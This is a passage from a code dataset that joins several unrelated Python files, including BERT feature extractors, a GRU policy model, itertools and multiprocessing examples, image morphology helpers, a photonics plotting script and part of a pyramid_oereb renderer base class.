''' Takes stim as input, preprocesses it, feeds it to Bert model, \n then postprocesses the output '''\n wds, ons, dur, tok, idx = self._preprocess(stims)\n preds = self.model(idx)\n data, feat, ons, dur = self._postprocess(stims, preds, tok, wds, ons, dur)\n return ExtractorResult(data, stims, self, features=feat, onsets=ons, \n durations=dur)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n ''' Postprocesses model output (subsets relevant information,\n transforms it where relevant, adds model metadata). \n Takes prediction array, token list, word list, onsets \n and durations and input. Here, returns token-level encodings \n (excluding special tokens).\n '''\n out = preds.last_hidden_state[:, 1:-1, :]\n if self.framework == 'pt':\n out = out.detach() \n out = out.numpy().squeeze()\n data = [out.tolist()]\n feat = ['encoding']\n if self.return_input:\n data += [tok, wds]\n feat += ['token', 'word']\n return data, feat, ons, dur\n \n def _to_df(self, result):\n res_df = pd.DataFrame(dict(zip(result.features, result._data)))\n res_df['object_id'] = range(res_df.shape[0])\n return res_df\n\n\nclass BertSequenceEncodingExtractor(BertExtractor):\n ''' Extract contextualized sequence encodings using pretrained BERT\n (or similar models, e.g. DistilBERT).\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n https://huggingface.co/transformers/pretrained_models.html\n or path to custom model.\n tokenizer (str): Type of tokenization used in the tokenization step.\n If different from model, out-of-vocabulary tokens may be treated as\n unknown tokens.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n pooling (str): defines numpy function to use to pool token-level \n encodings (excludes special tokens).\n return_special (str): defines whether to return encoding for special \n sequence tokens ('[CLS]' or '[SEP]'), instead of pooling of \n other tokens. Must be '[CLS]', '[SEP]', or 'pooler_output'.\n The latter option returns last layer hidden-state of [CLS] token \n further processed by a linear layer and tanh activation function,\n with linear weights trained on the next sentence classification \n task. Note that some Bert-derived models, such as DistilBert, \n were not trained on this task. For these models, setting this \n argument to 'pooler_output' will return an error.\n return_input (bool): If True, the extractor returns an additional \n feature column with the encoded sequence.\n model_kwargs (dict): Named arguments for pretrained model.\n See: https://huggingface.co/transformers/main_classes/model.html\n and https://huggingface.co/transformers/model_doc/bert.html\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type', \n 'pooling', 'return_special', 'return_input', 'model_class', \n 'model_kwargs', 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'model_class', \n 'pooling', 'return_special', 'tokenizer_type')\n\n def __init__(self, pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n framework='pt',\n pooling='mean',\n return_special=None,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n if return_special and pooling:\n logging.warning('Pooling and return_special argument are '\n 'mutually exclusive. Setting pooling to None.')\n pooling = None\n if pooling:\n try: \n getattr(np, pooling)\n except:\n raise(ValueError('Pooling must be a valid numpy function.'))\n elif return_special:\n if return_special not in ['[CLS]', '[SEP]', 'pooler_output']:\n raise(ValueError('Value of return_special argument must be '\n 'one of \\'[CLS]\\', \\'[SEP]\\' or \\'pooler_output\\''))\n self.pooling = pooling\n self.return_special = return_special\n super().__init__(\n pretrained_model=pretrained_model, tokenizer=tokenizer, \n return_input=return_input, model_class='AutoModel', \n framework=framework, model_kwargs=model_kwargs, \n tokenizer_kwargs=tokenizer_kwargs)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n try: \n dur = ons[-1] + dur[-1] - ons[0]\n except:\n dur = None\n ons = ons[0]\n if self.pooling:\n pool_func = getattr(np, self.pooling)\n p = preds.last_hidden_state[0, 1:-1, :]\n if self.framework == 'pt':\n p = p.detach()\n out = pool_func(p.numpy().squeeze(), axis=0)\n elif self.return_special:\n if self.return_special == '[CLS]':\n out = preds.last_hidden_state[:,0,:]\n elif self.return_special == '[SEP]':\n out = preds.last_hidden_state[:,-1,:]\n else:\n out = preds.pooler_output\n if self.framework == 'pt':\n out = out.detach()\n out = out.numpy().squeeze()\n data = [[out.tolist()]]\n feat = ['encoding']\n if self.return_input:\n data += [stims.name]\n feat += ['sequence'] \n return data, feat, ons, dur\n\n\nclass BertLMExtractor(BertExtractor):\n ''' Returns masked words predictions from BERT (or similar, e.g. \n DistilBERT) models.\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n https://huggingface.co/transformers/pretrained_models.html\n or path to custom model.\n tokenizer (str): Type of tokenization used in the tokenization step.\n If different from model, out-of-vocabulary tokens may be treated as\n unknown tokens.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n mask (int or str): Words to be masked (string) or indices of \n words in the sequence to be masked (indexing starts at 0). Can\n be either a single word/index or a list of words/indices.\n If str is passed and more than one word in the input matches \n the string, only the first one is masked. \n top_n (int): Specifies how many of the highest-probability tokens are\n to be returned. Mutually exclusive with target and threshold.\n target (str or list): Vocabulary token(s) for which probability is to \n be returned. Tokens defined in the vocabulary change across \n tokenizers. Mutually exclusive with top_n and threshold.\n threshold (float): If defined, only values above this threshold will\n be returned. Mutually exclusive with top_n and target.\n return_softmax (bool): if True, returns probability scores instead of \n raw predictions.\n return_masked_word (bool): if True, returns masked word (if defined \n in the tokenizer vocabulary) and its probability.\n model_kwargs (dict): Named arguments for pretrained model.\n See: https://huggingface.co/transformers/main_classes/model.html\n and https://huggingface.co/transformers/model_doc/bert.html.\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html.\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'top_n', 'target', \n 'mask', 'tokenizer_type', 'return_softmax', 'return_masked_word')\n _model_attributes = ('pretrained_model', 'framework', 'top_n', 'mask',\n 'target', 'threshold', 'tokenizer_type')\n\n def __init__(self,\n pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n framework='pt',\n mask='MASK',\n top_n=None,\n threshold=None,\n target=None,\n return_softmax=False,\n return_masked_word=False,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n if any([top_n and target, \n top_n and threshold, \n threshold and target]):\n raise ValueError('top_n, threshold and target arguments '\n 'are mutually exclusive')\n if type(mask) not in [int, str]:\n raise ValueError('Mask must be a string or an integer.')\n super().__init__(pretrained_model=pretrained_model,\n tokenizer=tokenizer, framework=framework, return_input=return_input, \n model_class='AutoModelWithLMHead', model_kwargs=model_kwargs, \n tokenizer_kwargs=tokenizer_kwargs)\n self.target = listify(target)\n if self.target:\n missing = set(self.target) - set(self.tokenizer.vocab.keys())\n if missing:\n logging.warning(f'{missing} not in vocabulary. Dropping.')\n present = set(self.target) & set(self.tokenizer.vocab.keys())\n self.target = list(present)\n if self.target == []:\n raise ValueError('No valid target token. Import transformers'\n ' and run transformers.BertTokenizer.from_pretrained'\n f'(\\'{tokenizer}\\').vocab.keys() to see available tokens')\n self.mask = mask\n self.top_n = top_n\n self.threshold = threshold\n self.return_softmax = return_softmax\n self.return_masked_word = return_masked_word\n \n def update_mask(self, new_mask):\n ''' Updates mask attribute with value of new_mask. \n Args:\n new_mask (str or int): word to mask (str) or index/position of the\n word to mask in input sequence (int). Indexing starts at 0.\n '''\n if type(new_mask) not in [str, int]:\n raise ValueError('Mask must be a string or an integer.')\n self.mask = new_mask\n\n def _mask_words(self, wds):\n mwds = wds.copy()\n if isinstance(self.mask, str):\n self.mask_token = self.mask\n self.mask_pos = np.where(np.array(mwds)==self.mask)[0][0]\n else:\n self.mask_pos = self.mask\n self.mask_token = mwds[self.mask]\n mwds[self.mask_pos] = '[MASK]'\n return mwds\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n if self.framework == 'pt':\n preds = preds.logits[:,1:-1,:].detach().numpy()\n else:\n preds = preds.logits[:,1:-1,:].numpy()\n if self.return_softmax:\n preds = scipy.special.softmax(preds, axis=-1)\n out_idx = preds[0,self.mask_pos,:].argsort()[::-1]\n if self.top_n:\n sub_idx = out_idx[:self.top_n]\n elif self.target:\n sub_idx = self.tokenizer.convert_tokens_to_ids(self.target)\n elif self.threshold:\n sub_idx = np.where(preds[0,self.mask_pos,:] >= self.threshold)[0]\n else:\n sub_idx = out_idx\n out_idx = [idx for idx in out_idx if idx in sub_idx]\n feat = self.tokenizer.convert_ids_to_tokens(out_idx)\n feat = [f.capitalize() if len(f)==len(f.encode()) else f for f in feat]\n data = [listify(p) for p in preds[0,self.mask_pos,out_idx]]\n if self.return_masked_word:\n feat, data = self._return_masked_word(preds, feat, data)\n if self.return_input:\n data += [stims.name]\n feat += ['sequence']\n mask_ons = listify(stims.elements[self.mask_pos].onset)\n mask_dur = listify(stims.elements[self.mask_pos].duration)\n return data, feat, mask_ons, mask_dur\n \n\n def _return_masked_word(self, preds, feat, data):\n if self.mask_token in self.tokenizer.vocab:\n true_vocab_idx = self.tokenizer.vocab[self.mask_token]\n true_score = preds[0,self.mask_pos,true_vocab_idx]\n else:\n true_score = np.nan\n logging.warning('True token not in vocabulary. Returning NaN')\n feat += ['true_word', 'true_word_score']\n data += [self.mask_token, true_score]\n return feat, data\n\n \nclass BertSentimentExtractor(BertExtractor):\n ''' Extracts sentiment for sequences using BERT (or similar, e.g. \n DistilBERT) models fine-tuned for sentiment classification.\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use (must be one fine-tuned for sentiment classification)\n tokenizer (str): Type of tokenization used in the tokenization step.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n return_softmax (bool): If True, the extractor returns softmaxed \n sentiment scores instead of raw model predictions.\n return_input (bool): If True, the extractor returns an additional \n feature column with the encoded sequence.\n model_kwargs (dict): Named arguments for pretrained model.\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type', \n 'return_softmax', 'return_input', 'model_class', 'model_kwargs', \n 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'tokenizer_type',\n 'return_input', 'return_softmax',)\n\n def __init__(self, \n pretrained_model='distilbert-base-uncased-finetuned-sst-2-english',\n tokenizer='bert-base-uncased',\n framework='pt',\n return_softmax=True,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n self.return_softmax = return_softmax\n super().__init__(\n pretrained_model=pretrained_model, tokenizer=tokenizer, \n framework=framework, return_input=return_input,\n model_class='AutoModelForSequenceClassification',\n model_kwargs=model_kwargs, tokenizer_kwargs=tokenizer_kwargs)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n data = preds.logits\n if self.framework == 'pt':\n data = data.detach()\n data = data.numpy().squeeze()\n if self.return_softmax:\n data = scipy.special.softmax(data) \n data = [listify(d) for d in data.tolist()]\n tok = [' '.join(wds)]\n try: \n dur = ons[-1] + dur[-1] - ons[0]\n except:\n dur = None\n ons = ons[0]\n feat = ['sent_pos', 'sent_neg']\n if self.return_input:\n data += tok\n feat += ['sequence'] \n return data, feat, ons, dur\n\n\nclass WordCounterExtractor(ComplexTextExtractor):\n\n ''' Extracts number of times each unique word has occurred within text\n\n Args:\n log_scale(bool): specifies if count values are to be returned in log-\n scale (defaults to False)\n '''\n\n _log_attributes = ('case_sensitive', 'log_scale')\n\n def __init__(self, case_sensitive=False, log_scale=False):\n self.log_scale = log_scale\n self.case_sensitive = case_sensitive\n self.features = ['log_word_count'] if self.log_scale else ['word_count']\n super().__init__()\n\n def _extract(self, stims):\n onsets = [s.onset for s in stims]\n durations = [s.duration for s in stims]\n tokens = [s.text for s in stims]\n tokens = [t if self.case_sensitive else t.lower() for t in tokens]\n word_counter = pd.Series(tokens).groupby(tokens).cumcount() + 1\n if self.log_scale:\n word_counter = np.log(word_counter)\n\n return ExtractorResult(word_counter, stims, self,\n features=self.features,\n onsets=onsets, durations=durations)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":36631,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"37697949105","text":"import multiprocessing\n\ndef calculate_square(num):\n square = num * num\n print(f\"Process {multiprocessing.current_process().name}: Square of {num} is {square}\")\n\nif __name__ == \"__main__\":\n numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n \n processes = []\n for num in numbers:\n process = multiprocessing.Process(target=calculate_square, args=(num,))\n processes.append(process)\n process.start()\n\n for process in processes:\n process.join()\n\n\n","repo_name":"jaisPank/assignment_2","sub_path":"answer7.py","file_name":"answer7.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18525081813","text":"# itertools: product, permutations, combinations, \n# accumulate, groupby, and infinite iterations \n\nfrom itertools import product\nfrom math import prod\na = [1,2]\nb = [3,4]\nprod = product(a, b)\nprint(list(prod)) #[(1, 3), (1, 4), (2, 3), (2, 4)]\n\na = [1,2]\nb = [3]\nc = product(a, b, repeat=2)\nprint(list(c))\n\nfrom itertools import permutations \na = [1,2,3]\np = permutations(a)\nprint(list(p))\n\n\np = permutations(a, 2) # length of 2 \nprint(list(p))\n\nfrom itertools import combinations \na = [1,2,3]\nc = combinations(a, 2) # 2nd value length is required\nprint(list(c))\n\n# combinations_with_replacement \nfrom itertools import combinations, combinations_with_replacement \na = [1,2,3,4]\ncr = combinations_with_replacement(a, 2)\n(a, 2)\nprint(list(cr))\n\n# accumulate , return sum \nfrom itertools import accumulate \na = [1,2,3]\nacc = accumulate(a)\nprint(a) #[1, 3, 6]\n\nimport operator\na = [1,2,3,4]\nacc = accumulate(a, func=operator.mul)\nprint(list(acc)) # [1, 2, 6, 24]\n\n# return max of each comparison\na = [1,2,5,3,4]\nacc = accumulate(a, func=max) \nprint(list(acc)) \n\nfrom itertools import groupby\ndef smaller_than_3(x):\n return x < 3 \n \na = [1,2,3,4,5]\ngroup_obj = groupby(a, key=smaller_than_3)\nfor k, v in group_obj:\n print(k,list(v))\n# True [1, 2]\n# False [3, 4, 5]\n\na = [1,2,3,4,5]\n# use lambda to do have same result \ngroup_obj = groupby(a, key=lambda x: x<3)\nfor k, v in group_obj:\n print(k,list(v))\n\n# group by dict key \npersons = [{'name': 'alice', 'age': 10},\n {'name': 'bob', 'age': 10},\n {'name': 'charlie', 'age': 15},\n {'name': 'dav', 'age': 12}]\ngroup_obj = groupby(persons, key=lambda x: x['age'])\nfor k, v in group_obj:\n print(k, list(v))\n# 10 [{'name': 'alice', 'age': 10}, {'name': 'bob', 'age': 10}]\n\nfrom itertools import count, cycle, repeat \nfor i in count(10):\n print(i)\n if i == 15:\n break # stop at 15 \n\na = [1,2,3]\nfor i in cycle(a): # cycle 3 times \n print(i)\n if i == 3:\n break # stop at 15 \n\nfor i in repeat(1, 4): # repeat 4 times \n print(i)","repo_name":"feimvnc/ml-python","sub_path":"python-programming/itertools/iter.py","file_name":"iter.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17977567283","text":"import torch\nfrom torch.autograd import Variable\nfrom .embedder import Embedder, CatModule\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n'''\nSimple, sequential convolutional net.\n'''\n\nclass GRUModel(nn.Module):\n\n def cuda_if(self, tobj):\n if torch.cuda.is_available():\n tobj = tobj.cuda()\n return tobj\n\n def __init__(self, input_space, output_space, h_size=200,\n bnorm=False,\n lnorm=False,\n discrete_env=True):\n super().__init__()\n\n self.input_space = input_space\n self.output_space = output_space\n self.h_size = h_size\n self.bnorm = bnorm\n self.lnorm = lnorm\n self.discrete_env = discrete_env\n\n # Embedding Net\n self.embedder = Embedder(self.input_space, self.h_size,\n self.bnorm)\n\n # Recurrent Network\n self.h_init = torch.randn(1,self.h_size)\n divisor = float(np.sqrt(self.h_size))\n self.h_init = nn.Parameter(self.h_init/divisor)\n self.rnn = nn.GRUCell(input_size=(self.h_size+self.output_space),\n hidden_size=self.h_size)\n\n # Policy\n self.pre_valpi = CatModule(nn.Sequential(\n nn.Linear(2*self.h_size, self.h_size),\n nn.ReLU()))\n self.pi = nn.Linear(self.h_size, self.output_space)\n if not self.discrete_env:\n self.logsigs = nn.Parameter(torch.zeros(1,self.output_space))\n self.value = nn.Linear(self.h_size, 1)\n\n if self.lnorm:\n self.layer_norm = nn.LayerNorm(self.h_size)\n\n def get_new_shape(self, shape, depth, ksize, padding, stride):\n new_shape = [depth]\n for i in range(2):\n new_shape.append(self.new_size(shape[i+1], ksize, padding, stride))\n return new_shape\n \n def new_size(self, shape, ksize, padding, stride):\n return (shape - ksize + 2*padding)//stride + 1\n\n def embeddings(self, state):\n \"\"\"\n Creates an embedding for the state.\n\n state - Variable FloatTensor (BatchSize, Channels, Height, Width)\n \"\"\"\n return self.embedder(state)\n\n def forward(self, x, h):\n embs = self.embeddings(x)\n val, pi, h = self.val_pi(embs, h)\n return val, pi, h\n\n def val_pi(self, state_emb, h):\n \"\"\"\n Uses the state embedding to produce an action.\n\n state_emb - the state embedding created by the emb_net\n h - the recurrent hidden state\n \"\"\"\n state_emb = self.pre_valpi(state_emb, h)\n pi = self.pi(state_emb)\n value = self.value(state_emb)\n rnn_inpt = torch.cat([state_emb, pi], dim=-1)\n h = self.rnn(rnn_inpt, h)\n if self.lnorm:\n h = self.layer_norm(h)\n if not self.discrete_env:\n sig = torch.exp(self.logsigs)+0.00001\n sig = sig.repeat(len(pi),1)\n mu = torch.tanh(pi)\n return value, (mu,sig), h\n return value, pi, h\n\n def fresh_h(self, batch_size=1):\n \"\"\"\n returns a new hidden state vector for the rnn\n \"\"\"\n return self.h_init.repeat(batch_size,1)\n\n def req_grads(self, calc_bool):\n \"\"\"\n An on-off switch for the requires_grad parameter for each internal Parameter.\n\n calc_bool - Boolean denoting whether gradients should be calculated.\n \"\"\"\n for param in self.parameters():\n param.requires_grad = calc_bool\n\n","repo_name":"grantsrb/CuriosityDriven-PPO","sub_path":"models/gru_model.py","file_name":"gru_model.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11817714763","text":"def codex(msj):\n print(\"Mensaje incriptado: \", end=\"\")\n key_word = 'MURCIELAGO'\n key = {value: key for (key, value) in enumerate(key_word)}\n for x in msj:\n print(key[x], end=\"\") if x in key else print(x, end=\"\")\n print(\"\")\n\n\nif __name__ == '__main__':\n while True:\n codex(input(\"Ingrese la palabra a incriptar:\").upper())\n","repo_name":"JNMGR14/Encryptador","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31499102344","text":"import meep as mp\nimport meep.adjoint as mpa\nimport numpy as np\nfrom autograd import numpy as npa\nfrom autograd import tensor_jacobian_product, grad\nfrom matplotlib import pyplot as plt\nimport nlopt\nfrom utils import fit_initial_params\nmp.quiet()\nimport splitter_simple as ss\nimport matplotlib.gridspec as gridspec\nfrom matplotlib_scalebar.scalebar import ScaleBar\nfrom matplotlib import colors\n\nsplitter_data = np.load(\"splitter_data.npz\")\nx = splitter_data['data']\nresults = splitter_data['results']\n\niteration = np.arange(1,x.shape[0]+1)\nbeta = [8, 32, np.inf]\nbeta_history = []\nfor iters in range(len(beta)):\n for i in range(ss.maxeval):\n beta_history.append(beta[iters])\n# ----------------------------------------------- #\n# Evolution plot #\n# ----------------------------------------------- #\nif 1:\n fig = plt.figure(figsize=(5.25,4.0), constrained_layout=True)\n gs0 = gridspec.GridSpec(3, 1, figure=fig, hspace=0.1, wspace=0, height_ratios=[0.25,0.25,0.5])\n\n # view the evolution of various designs using TO\n iters = [0,3,10,16,19]\n gs00 = gridspec.GridSpecFromSubplotSpec(1, len(iters), subplot_spec=gs0[0], hspace=0, wspace=0)\n for i,ki in enumerate(iters):\n ax = fig.add_subplot(gs00[i])\n ss.opt.update_design([ss.mapping(x[ki,:])],beta=beta_history[ki])\n ss.opt.plot2D(False,output_plane=mp.Volume(size=mp.Vector3(2,2)),\n eps_parameters={'resolution':100})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n \n # view the evolution of various designs using shape optimization\n iters = [21,24,26,29,-1]\n gs00 = gridspec.GridSpecFromSubplotSpec(1, len(iters), subplot_spec=gs0[1], hspace=0, wspace=0)\n for i,ki in enumerate(iters):\n ax = fig.add_subplot(gs00[i])\n ss.opt.update_design([ss.mapping(x[ki,:])],beta=beta_history[ki])\n ss.opt.plot2D(False,output_plane=mp.Volume(size=mp.Vector3(2,2)),\n eps_parameters={'resolution':100})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n \n # add the iteration plot\n splitter_data = np.load(\"splitter_data.npz\")\n x = splitter_data['data']\n results = splitter_data['results']\n sr = 0.5 - np.sqrt(results/2)\n\n splitter_data_smoothing = np.load(\"splitter_no_averaging_data.npz\")\n x_smoothing = splitter_data_smoothing['data']\n results_smoothing = splitter_data_smoothing['results']\n sr_smooth = 0.5 - np.sqrt(results_smoothing/2)\n\n gs00 = gridspec.GridSpecFromSubplotSpec(1, 2, width_ratios=[0.6,0.4], subplot_spec=gs0[2], hspace=0, wspace=0)\n ax = fig.add_subplot(gs00[0])\n #plt.plot(10*np.log10(1-results),'-o')\n plt.plot(sr*100,'-o')\n #plt.plot(10*np.log10(1-results_smoothing),'-o')\n plt.plot(sr_smooth*100,'-o')\n plt.ylabel(\"Transmission (%)\")\n plt.xlabel(\"Iteration\")\n ax.tick_params(which='both',direction='in')\n ax.xaxis.set_major_locator(plt.MaxNLocator(10))\n ax.yaxis.set_major_locator(plt.MaxNLocator(8))\n #plt.yticks([-1.5,-1,-0.5,0])\n #plt.grid(True)\n #plt.title(\"(b)\")\n\n # add the steady state plot\n ax = fig.add_subplot(gs00[1])\n ss.opt.update_design([ss.mapping(x[-1,:])],beta=beta_history[-1])\n ss.opt.sim.sources[0].src=mp.ContinuousSource(wavelength=1.55)\n ss.opt.sim.run(until=200)\n ss.opt.plot2D(False, fields=mp.Ez,\n output_plane=mp.Volume(size=mp.Vector3(3.5,3.5)),\n plot_boundaries_flag=False,plot_sources_flag=False,\n eps_parameters={'resolution':100},\n field_parameters={'alpha':0.80})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n #plt.title(\"(c)\")\n\n if mp.am_master():\n plt.savefig(\"splitter.svg\",dpi=300)\n plt.show()","repo_name":"smartalecH/subpixel_smoothing","sub_path":"examples/process_splitter.py","file_name":"process_splitter.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8297198676","text":"import cv2\nimport numpy as np\n\n\"\"\"\nMorphologicalTransformation\n@input: image or images to tranform\n@kernel: structuring element to do the Morphological transofration\n@type 'erosion', 'dilation', 'opening', 'closing', gradient', 'top-hat', 'black-hat'\n\"\"\"\ndef MorphologicalTransformation(input, kernel, type):\n\n if isinstance(input, (list,)):\n input = np.array(input)\n\n if input.dtype != np.uint8:\n input = np.uint8(input)\n\n list_transf = []\n for i, img in enumerate(input):\n\n if type == 'erosion':\n transf = cv2.erode(img, kernel, iterations=1)\n elif type == 'dilation':\n transf = cv2.dilate(img, kernel, iterations=1)\n elif type == 'opening':\n transf = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n elif type == 'closing':\n transf = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n elif type == 'gradient':\n transf = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n elif type == 'top-hat':\n transf = cv2.morphologyEx(img, cv2.MORPH_TOPHAT, kernel)\n elif type == 'black-hat':\n transf = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, kernel)\n else:\n raise ValueError(\"{} does not exist as Morphologycal Transformation\". format(type))\n\n list_transf.append(transf)\n\n return np.array(list_transf)","repo_name":"mcv-m6-video/mcv-m6-2018-team8","sub_path":"Week3/MorphologicTransformation.py","file_name":"MorphologicTransformation.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74580521769","text":"a, b = map(int, input().split(' '))\nn = int(input())\nf = 0\ng = 0\nended = 0\nfor _ in range(n):\n u, x, v, y = map(int, input().split(' '))\n # print(u, x, v, y, a, b, f, g)\n if ended!=0 or (x==u+v and y==u+v) or (x!=u+v and y!=u+v):\n continue\n # if ended != 0:\n # continue\n if x == u+v:\n f += 1\n if y == u+v:\n g += 1\n if f > a:\n ended = 1\n if g > b:\n ended = 2\nif ended == 1:\n print('A', g, sep='\\n')\nif ended == 2:\n print('B', f, sep='\\n')","repo_name":"Eqno/GPLT-ExerciseRecord","sub_path":"2016/preliminary/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715006264","text":"# -*- coding: utf-8 -*-\nimport datetime\n\nimport logging\nimport unicodedata\n\nfrom pyramid.httpexceptions import HTTPServerError\nfrom pyramid.path import DottedNameResolver\nfrom pyramid.request import Request\nfrom pyramid.testing import DummyRequest\nfrom pyramid_oereb.core import get_multilingual_element\n\nfrom shapely.geometry import mapping\n\nfrom pyramid_oereb import Config\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Base(object):\n def __init__(self, info):\n \"\"\"\n Creates a new base renderer instance.\n\n Args:\n info (pyramid.interfaces.IRendererInfo): Info object.\n \"\"\"\n self._info_ = info\n self._language = str(Config.get('default_language')).lower()\n\n @classmethod\n def get_symbol_ref(cls, request, record):\n \"\"\"\n Returns the link to the symbol of the specified public law restriction.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n record (pyramid_oereb.core.records.plr.PlrRecord or\n pyramid_oereb.core.records.view_service.LegendEntryRecord): The record of the public law\n restriction to get the symbol reference for.\n\n Returns:\n uri: The link to the symbol for the specified public law restriction.\n \"\"\"\n method = None\n for plr in Config.get('plrs'):\n if str(plr.get('code')).lower() == str(record.theme.code).lower():\n method = DottedNameResolver().resolve(plr.get('hooks').get('get_symbol_ref'))\n if callable(method):\n return method(request, record)\n log.error('No \"get_symbol_ref\" method found for theme {}'.format(record.theme.code))\n raise HTTPServerError()\n\n @classmethod\n def get_logo_ref(cls, request, logo_code, language, image_dict):\n \"\"\"\n Returns the link to the symbol of the specified logo.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n logo_code (str): Code of logo, eg. bs or ch.\n language (str): language of extract.\n image_dict (dict): dict of image\n\n Returns:\n uri: The link to the symbol for the specified logo.\n \"\"\"\n method = None\n method = DottedNameResolver().resolve(Config.get_logo_hooks().get('get_logo_ref'))\n if callable(method):\n return method(request, logo_code, language, image_dict)\n log.error('No \"get_logo_ref\" method found for logos')\n raise HTTPServerError()\n\n @classmethod\n def get_qr_code_ref(cls, request, qr_code_ref):\n \"\"\"\n Returns the link for the qr_code.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n qr_code_ref (str): The string of qr-code url.\n\n Returns:\n uri: the link to the qr_code.\n \"\"\"\n method = None\n method = DottedNameResolver().resolve(Config.get_logo_hooks().get('get_qr_code_ref'))\n if callable(method):\n return method(request, qr_code_ref)\n log.error('No \"get_qr_code_ref\" method found for logos')\n raise HTTPServerError()\n\n @classmethod\n def get_response(cls, system):\n \"\"\"\n Returns the response object if available.\n\n Args:\n system (dict): The available system properties.\n\n Returns:\n pyramid.response.Response or None: The response object.\n \"\"\"\n request = system.get('request')\n if isinstance(request, Request) or isinstance(request, DummyRequest):\n return request.response\n return None\n\n @classmethod\n def get_request(cls, system):\n \"\"\"\n Returns the request object if available.\n\n Args:\n system (dict): The available system properties.\n\n Returns:\n pyramid.request.Request or None: The request object.\n \"\"\"\n request = system.get('request')\n if isinstance(request, Request) or isinstance(request, DummyRequest):\n return request\n return None\n\n @classmethod\n def date_time(cls, dt):\n \"\"\"\n Formats the date/time according to the specification.\n\n Args:\n dt (datetime.dateordatetime.timeordatetime.datetime): The datetime object.\n\n Returns:\n str: The formatted date/time.\n \"\"\"\n if isinstance(dt, datetime.date) or isinstance(dt, datetime.time)\\\n or isinstance(dt, datetime.datetime):\n return dt.strftime('%Y-%m-%dT%H:%M:%S')\n return dt\n\n @property\n def info(self):\n \"\"\" pyramid.interfaces.IRendererInfo: The passed renderer info object.\"\"\"\n return self._info_\n\n def get_localized_text(self, values, not_null=True):\n \"\"\"\n Returns the requested language of a multilingual text element.\n\n Args:\n values (str or dict): The multilingual values encoded as JSON.\n not_null (boolean): Throws an error if there is no value for this language.\n\n Returns:\n dict of str: Dictionary containing the localized representation.\n \"\"\"\n default_language = Config.get('default_language')\n if isinstance(values, dict):\n if self._language in values:\n return {\n 'Language': self._language,\n 'Text': get_multilingual_element(values, self._language, not_null)\n }\n else:\n return {\n 'Language': default_language,\n 'Text': get_multilingual_element(values, default_language, not_null)\n }\n else:\n return {\n 'Language': default_language,\n 'Text': values\n }\n\n def 